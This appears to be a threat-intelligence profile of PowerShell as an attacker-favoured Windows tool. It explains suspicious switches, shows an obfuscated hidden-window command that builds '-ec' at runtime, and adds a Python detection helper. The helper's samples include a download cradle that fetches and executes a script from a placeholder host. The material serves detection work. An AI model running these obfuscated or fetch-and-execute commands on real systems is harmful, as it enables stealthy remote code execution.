Source: Wild
Threat: LOLBin
Powershell is a Windows-native command-line interpreter and scripting host. It is executed very commonly across most environments and is a popular tool for administrators and attackers alike.
EchoTrail Prevalence Score (EPS) dashboard (panel titles only; the two values below survived extraction without their labels)
Rank Analysis: Host Prevalence, Execution Rank
Behavioral Analysis: Top Filenames, Top Paths (98.99 %), Top Network Ports (47.88 %)
Ancestry Analysis: Top GrandParents, Top Parents, Top Children
Security Analysis
Powershell.exe is one of the most commonly used utilities built into Windows. Its uses are too numerous to capture here, and from behavior alone it can be difficult to distinguish administrator activity from attacker activity. Attackers favor the tool because it is powerful, but also because it is so common that its execution rarely stands out. Indicators of attacker use include command-line switches such as -EncodedCommand (also accepted in abbreviated forms like -e, -ec and -enc) and -WindowStyle Hidden (often abbreviated -w hidden). These also appear in legitimate use, but they are typically of sufficient interest to warrant a closer look at the surrounding context: the parent process, the user, and the decoded content of any encoded command.

Powershell Obfuscation:
Example of switch obfuscation. The three variables are assembled into the string "-ec", so the nested invocation is effectively "powershell -ec <base64_string>", but the switch never appears literally in the outer command line:

    powershell -window hidden -C "set-variable -name 'LB' -value '-'; set-variable -name 'I' -value 'e'; set-variable -name 'V' -value 'c'; set-variable -name 'wP' -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()); powershell (get-variable wP).value.toString() <base64_string>"

Powershell Execution Policy Bypass Techniques

Powershell alternatives to traditional host-info commands, e.g. whoami:

Base64 Decode
To decode a base64 string on Mac (the macOS base64 tool uses -D; GNU coreutils uses -d):

    echo [base64string without brackets] | base64 -D

To decode a base64 string on Windows:

    echo [base64string without brackets] > encoded.txt
    certutil -decode encoded.txt decoded.txt
    type decoded.txt

Decode base64 in Powershell:

    PS > [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("encoded stuff goes here"))

Note that a payload passed to -EncodedCommand is base64 over UTF-16LE text, so decode it with [System.Text.Encoding]::Unicode.GetString rather than ASCII; the ASCII decoder leaves a null byte after every character, and decoded.txt from the certutil route will contain the same interleaved nulls.
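The following Python triage helper is an added example, not code from the EchoTrail page. It recognizes the switches discussed above in any abbreviation PowerShell accepts (-e, -ec, -enc, -w, -window, and so on), decodes an -EncodedCommand payload as PowerShell does (base64 over UTF-16LE) and shows what the ASCII decode from the page yields on the same bytes, and applies one heuristic, with a hypothetical indicator name, for the variable-assembly obfuscation shown above. The sample command lines, the host example.invalid and the script path are constructed, not real telemetry.

```python
"""Triage powershell.exe command lines: flag suspicious switches, decode
-EncodedCommand payloads (UTF-16LE, not ASCII), spot nested invocations.
Added example; sample command lines are constructed."""
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of a parameter name. Each entry is
# (name to prefix-match, shortest prefix PowerShell accepts, canonical name).
# "ec" is an explicit alias PowerShell also accepts for -EncodedCommand.
SWITCHES = [
    ("encodedcommand", "e", "encodedcommand"),
    ("ec", "e", "encodedcommand"),
    ("windowstyle", "w", "windowstyle"),
    ("noprofile", "nop", "noprofile"),
    ("noninteractive", "noni", "noninteractive"),
    ("executionpolicy", "ex", "executionpolicy"),
    ("command", "c", "command"),
]


def canonical_switch(token: str) -> Optional[str]:
    """Map '-enc', '/EC', '-window', ... to the full parameter name, or None."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    key = token[1:].lower()
    for name, shortest, canon in SWITCHES:
        if name.startswith(key) and len(key) >= len(shortest):
            return canon
    return None


def tokenize(cmdline: str) -> list:
    """Split a command line, keeping double-quoted arguments together
    (adequate for triage; not a full cmd.exe parser)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode an -EncodedCommand payload: base64 of UTF-16LE text."""
    if not b64:
        return None
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad base64 or odd byte count
        return None


def decode_as_ascii(b64: str) -> str:
    """What ASCII.GetString gives on the same payload: a NUL after each char."""
    return base64.b64decode(b64).decode("ascii", errors="replace")


def encode_command(script: str) -> str:
    """Build an -EncodedCommand payload the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(cmdline: str) -> dict:
    """Return indicator names found and the decoded encoded command, if any."""
    tokens = tokenize(cmdline)
    findings, decoded, i = [], None, 0
    while i < len(tokens):
        sw = canonical_switch(tokens[i])
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if sw == "encodedcommand":
            findings.append("encoded_command")
            decoded = decode_encoded_command(nxt)
            i += 1
        elif sw == "windowstyle" and nxt.lower() == "hidden":
            findings.append("hidden_window")
            i += 1
        elif sw == "executionpolicy" and nxt.lower() in ("bypass", "unrestricted"):
            findings.append("executionpolicy_" + nxt.lower())
            i += 1
        elif sw in ("noprofile", "noninteractive"):
            findings.append(sw)
        i += 1
    # Heuristic (hypothetical indicator name): a second powershell launched from
    # inside the first with its switch assembled from variables, as on the page.
    body = cmdline.lower()
    if body.count("powershell") > 1 and "get-variable" in body:
        findings.append("nested_powershell_variable_assembly")
    return {"findings": findings, "decoded_command": decoded}


# Constructed samples: a download cradle, an admin script run, and the page's
# variable-assembly example with "aABpAA==" (UTF-16LE "hi") as the payload.
SAMPLES = [
    "powershell.exe -nop -w hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    "powershell -window hidden -C \"set-variable -name 'LB' -value '-'; "
    "set-variable -name 'I' -value 'e'; set-variable -name 'V' -value 'c'; "
    "set-variable -name 'wP' -value ((get-variable LB).value.toString()"
    "+(get-variable I).value.toString()+(get-variable V).value.toString()); "
    "powershell (get-variable wP).value.toString() aABpAA==\"",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(triage(s))
    print(repr(decode_encoded_command("aABpAA==")), repr(decode_as_ascii("aABpAA==")))
```

The third sample is the point of the obfuscation section: the plain switch check finds only the hidden window, because "-ec" is built at runtime inside the -C string, and only the nesting heuristic flags it. Real telemetry also needs the child powershell.exe event, whose own command line will carry the literal -ec and can be decoded directly.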